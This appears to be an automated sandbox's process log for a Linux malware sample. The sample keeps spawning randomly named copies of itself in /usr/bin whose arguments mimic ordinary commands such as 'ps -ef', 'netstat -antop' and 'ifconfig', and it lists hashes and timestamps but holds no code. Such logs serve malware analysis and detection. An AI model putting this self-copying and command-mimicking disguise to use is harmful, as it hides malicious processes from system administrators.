                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:20
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:20
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/uoewtvxqdd
                                                                                Arguments:/usr/bin/uoewtvxqdd gnome-terminal 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:39aa00025c468148f76c1297ae9e076e

                                                                                General

                                                                                Start time:00:24:20
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/uoewtvxqdd
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:39aa00025c468148f76c1297ae9e076e

                                                                                General

                                                                                Start time:00:24:20
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:20
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:20
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/uoewtvxqdd
                                                                                Arguments:/usr/bin/uoewtvxqdd ifconfig 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:39aa00025c468148f76c1297ae9e076e

                                                                                General

                                                                                Start time:00:24:20
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/uoewtvxqdd
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:39aa00025c468148f76c1297ae9e076e

                                                                                General

                                                                                Start time:00:24:20
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:20
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:20
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/uoewtvxqdd
                                                                                Arguments:/usr/bin/uoewtvxqdd id 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:39aa00025c468148f76c1297ae9e076e

                                                                                General

                                                                                Start time:00:24:20
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/uoewtvxqdd
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:39aa00025c468148f76c1297ae9e076e

                                                                                General

                                                                                Start time:00:24:20
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:20
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:20
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/uoewtvxqdd
                                                                                Arguments:/usr/bin/uoewtvxqdd "route -n" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:39aa00025c468148f76c1297ae9e076e

                                                                                General

                                                                                Start time:00:24:20
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/uoewtvxqdd
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:39aa00025c468148f76c1297ae9e076e

                                                                                General

                                                                                Start time:00:24:25
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:25
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:25
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/rlyjyybyum
                                                                                Arguments:/usr/bin/rlyjyybyum "route -n" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:0713019b4738a770e7b6e1a45b02c8d9

                                                                                General

                                                                                Start time:00:24:25
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/rlyjyybyum
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:0713019b4738a770e7b6e1a45b02c8d9

                                                                                General

                                                                                Start time:00:24:25
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:25
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:25
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/rlyjyybyum
                                                                                Arguments:/usr/bin/rlyjyybyum "grep \"A\"" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:0713019b4738a770e7b6e1a45b02c8d9

                                                                                General

                                                                                Start time:00:24:25
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/rlyjyybyum
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:0713019b4738a770e7b6e1a45b02c8d9

                                                                                General

                                                                                Start time:00:24:26
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:26
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:26
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/rlyjyybyum
                                                                                Arguments:/usr/bin/rlyjyybyum "ls -la" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:0713019b4738a770e7b6e1a45b02c8d9

                                                                                General

                                                                                Start time:00:24:26
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/rlyjyybyum
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:0713019b4738a770e7b6e1a45b02c8d9

                                                                                General

                                                                                Start time:00:24:26
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:26
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:26
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/rlyjyybyum
                                                                                Arguments:/usr/bin/rlyjyybyum "sleep 1" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:0713019b4738a770e7b6e1a45b02c8d9

                                                                                General

                                                                                Start time:00:24:26
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/rlyjyybyum
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:0713019b4738a770e7b6e1a45b02c8d9

                                                                                General

                                                                                Start time:00:24:26
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:26
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:26
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/rlyjyybyum
                                                                                Arguments:/usr/bin/rlyjyybyum "cd /etc" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:0713019b4738a770e7b6e1a45b02c8d9

                                                                                General

                                                                                Start time:00:24:26
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/rlyjyybyum
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:0713019b4738a770e7b6e1a45b02c8d9

                                                                                General

                                                                                Start time:00:24:31
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:31
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:31
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/tjdqviitkh
                                                                                Arguments:/usr/bin/tjdqviitkh "netstat -antop" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:c2561c3afe2388b8727667fcefb207b7

                                                                                General

                                                                                Start time:00:24:31
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/tjdqviitkh
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:c2561c3afe2388b8727667fcefb207b7

                                                                                General

                                                                                Start time:00:24:31
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:31
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:31
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/tjdqviitkh
                                                                                Arguments:/usr/bin/tjdqviitkh "ps -ef" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:c2561c3afe2388b8727667fcefb207b7

                                                                                General

                                                                                Start time:00:24:31
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/tjdqviitkh
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:c2561c3afe2388b8727667fcefb207b7

                                                                                General

                                                                                Start time:00:24:31
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:31
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:31
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/tjdqviitkh
                                                                                Arguments:/usr/bin/tjdqviitkh "ps -ef" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:c2561c3afe2388b8727667fcefb207b7

                                                                                General

                                                                                Start time:00:24:31
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/tjdqviitkh
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:c2561c3afe2388b8727667fcefb207b7

                                                                                General

                                                                                Start time:00:24:31
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:31
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:31
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/tjdqviitkh
                                                                                Arguments:/usr/bin/tjdqviitkh who 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:c2561c3afe2388b8727667fcefb207b7

                                                                                General

                                                                                Start time:00:24:31
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/tjdqviitkh
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:c2561c3afe2388b8727667fcefb207b7

                                                                                General

                                                                                Start time:00:24:32
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:32
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:32
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/tjdqviitkh
                                                                                Arguments:/usr/bin/tjdqviitkh "route -n" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:c2561c3afe2388b8727667fcefb207b7

                                                                                General

                                                                                Start time:00:24:32
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/tjdqviitkh
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:c2561c3afe2388b8727667fcefb207b7

                                                                                General

                                                                                Start time:00:24:37
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:37
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:37
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/aspbnnkmso
                                                                                Arguments:/usr/bin/aspbnnkmso top 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:1d6fd0eb72068b2c5f4c00b6bd4ccce7

                                                                                General

                                                                                Start time:00:24:37
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/aspbnnkmso
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:1d6fd0eb72068b2c5f4c00b6bd4ccce7

                                                                                General

                                                                                Start time:00:24:37
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:37
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:37
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/aspbnnkmso
                                                                                Arguments:/usr/bin/aspbnnkmso whoami 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:1d6fd0eb72068b2c5f4c00b6bd4ccce7

                                                                                General

                                                                                Start time:00:24:37
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/aspbnnkmso
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:1d6fd0eb72068b2c5f4c00b6bd4ccce7

                                                                                General

                                                                                Start time:00:24:37
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:37
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:37
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/aspbnnkmso
                                                                                Arguments:/usr/bin/aspbnnkmso "route -n" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:1d6fd0eb72068b2c5f4c00b6bd4ccce7

                                                                                General

                                                                                Start time:00:24:37
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/aspbnnkmso
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:1d6fd0eb72068b2c5f4c00b6bd4ccce7

                                                                                General

                                                                                Start time:00:24:37
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:37
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:37
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/aspbnnkmso
                                                                                Arguments:/usr/bin/aspbnnkmso bash 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:1d6fd0eb72068b2c5f4c00b6bd4ccce7

                                                                                General

                                                                                Start time:00:24:37
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/aspbnnkmso
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:1d6fd0eb72068b2c5f4c00b6bd4ccce7

                                                                                General

                                                                                Start time:00:24:37
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:37
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:37
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/aspbnnkmso
                                                                                Arguments:/usr/bin/aspbnnkmso sh 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:1d6fd0eb72068b2c5f4c00b6bd4ccce7

                                                                                General

                                                                                Start time:00:24:37
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/aspbnnkmso
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:1d6fd0eb72068b2c5f4c00b6bd4ccce7

                                                                                General

                                                                                Start time:00:24:42
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:42
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:42
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/lgnmbyzzlq
                                                                                Arguments:/usr/bin/lgnmbyzzlq bash 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:54d3b5b40db4c72ead6a4d36581f0413

                                                                                General

                                                                                Start time:00:24:42
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/lgnmbyzzlq
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:54d3b5b40db4c72ead6a4d36581f0413

                                                                                General

                                                                                Start time:00:24:43
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:43
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:43
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/lgnmbyzzlq
                                                                                Arguments:/usr/bin/lgnmbyzzlq "sleep 1" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:54d3b5b40db4c72ead6a4d36581f0413

                                                                                General

                                                                                Start time:00:24:43
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/lgnmbyzzlq
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:54d3b5b40db4c72ead6a4d36581f0413

                                                                                General

                                                                                Start time:00:24:43
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:43
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:43
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/lgnmbyzzlq
                                                                                Arguments:/usr/bin/lgnmbyzzlq "ps -ef" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:54d3b5b40db4c72ead6a4d36581f0413

                                                                                General

                                                                                Start time:00:24:43
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/lgnmbyzzlq
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:54d3b5b40db4c72ead6a4d36581f0413

                                                                                General

                                                                                Start time:00:24:43
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:43
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:43
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/lgnmbyzzlq
                                                                                Arguments:/usr/bin/lgnmbyzzlq bash 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:54d3b5b40db4c72ead6a4d36581f0413

                                                                                General

                                                                                Start time:00:24:43
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/lgnmbyzzlq
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:54d3b5b40db4c72ead6a4d36581f0413

                                                                                General

                                                                                Start time:00:24:43
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:43
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:43
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/lgnmbyzzlq
                                                                                Arguments:/usr/bin/lgnmbyzzlq ifconfig 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:54d3b5b40db4c72ead6a4d36581f0413

                                                                                General

                                                                                Start time:00:24:43
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/lgnmbyzzlq
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:54d3b5b40db4c72ead6a4d36581f0413

                                                                                General

                                                                                Start time:00:24:48
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:48
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:48
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/nyavevzqtw
                                                                                Arguments:/usr/bin/nyavevzqtw "netstat -antop" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:98476f6b14264275e728579e9462e596

                                                                                General

                                                                                Start time:00:24:48
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/nyavevzqtw
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:98476f6b14264275e728579e9462e596

                                                                                General

                                                                                Start time:00:24:48
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:48
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:48
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/nyavevzqtw
                                                                                Arguments:/usr/bin/nyavevzqtw "cat resolv.conf" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:98476f6b14264275e728579e9462e596

                                                                                General

                                                                                Start time:00:24:48
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/nyavevzqtw
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:98476f6b14264275e728579e9462e596

                                                                                General

                                                                                Start time:00:24:49
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:49
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:49
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/nyavevzqtw
                                                                                Arguments:/usr/bin/nyavevzqtw "ls -la" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:98476f6b14264275e728579e9462e596

                                                                                General

                                                                                Start time:00:24:49
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/nyavevzqtw
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:98476f6b14264275e728579e9462e596

                                                                                General

                                                                                Start time:00:24:49
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:49
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:49
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/nyavevzqtw
                                                                                Arguments:/usr/bin/nyavevzqtw "ifconfig eth0" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:98476f6b14264275e728579e9462e596

                                                                                General

                                                                                Start time:00:24:49
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/nyavevzqtw
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:98476f6b14264275e728579e9462e596

                                                                                General

                                                                                Start time:00:24:49
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:49
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

                                                                                Start time:00:24:49
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/nyavevzqtw
                                                                                Arguments:/usr/bin/nyavevzqtw "echo \"find\"" 4554
                                                                                File size:625900 bytes
                                                                                MD5 hash:98476f6b14264275e728579e9462e596

                                                                                General

                                                                                Start time:00:24:49
                                                                                Start date:20/07/2021
                                                                                Path:/usr/bin/nyavevzqtw
                                                                                Arguments:n/a
                                                                                File size:625900 bytes
                                                                                MD5 hash:98476f6b14264275e728579e9462e596

                                                                                General

                                                                                Start time:00:24:54
                                                                                Start date:20/07/2021
                                                                                Path:/tmp/4ljhdTTyiA
                                                                                Arguments:n/a
                                                                                File size:625889 bytes
                                                                                MD5 hash:349456ecaa1380a142f15810a8260378

                                                                                General

